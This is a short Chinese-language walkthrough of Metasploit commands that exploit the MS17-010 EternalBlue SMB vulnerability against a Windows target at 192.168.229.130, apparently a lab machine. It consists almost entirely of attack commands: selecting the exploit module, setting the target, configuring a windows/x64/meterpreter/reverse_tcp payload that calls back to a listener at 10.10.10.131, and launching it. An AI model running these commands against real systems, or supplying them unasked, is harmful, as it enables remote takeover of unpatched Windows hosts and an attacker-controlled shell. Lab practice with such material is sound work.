打开MSF

msfconsole

搜索ms17-010模块

search ms17-010

使用该模块

use exploit/windows/smb/ms17_010_eternalblue

设置远程主机(靶机)

set rhost 192.168.229.130

【可选】 配置payload

payload只需要配置监听返回会话的IP;

msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(ms17_010_eternalblue) > set lhost 10.10.10.131
lhost => 10.10.10.131

启动

exploit